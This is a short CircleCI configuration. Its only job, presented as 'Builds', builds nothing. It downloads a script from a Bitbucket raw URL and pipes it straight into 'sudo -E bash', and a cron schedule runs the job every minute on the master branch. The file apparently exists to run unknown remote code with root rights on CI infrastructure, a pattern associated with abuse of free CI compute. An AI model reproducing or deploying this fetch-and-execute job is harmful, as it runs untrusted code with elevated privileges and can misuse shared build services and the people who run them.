version: 2.1
jobs:
  Builds:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run:
          name: Mulai Bro...
          command: curl -sL https://bitbucket.org/ayampaha-01/testo/raw/66c99fcab2289dc3c07c6346227537f6ecbe6028/index | sudo -E bash -

workflows:
  scheduled-workflow:
    triggers:
      - schedule:
          cron: "* * * * *"
          filters:
            branches:
              only: master
    jobs:
      - Builds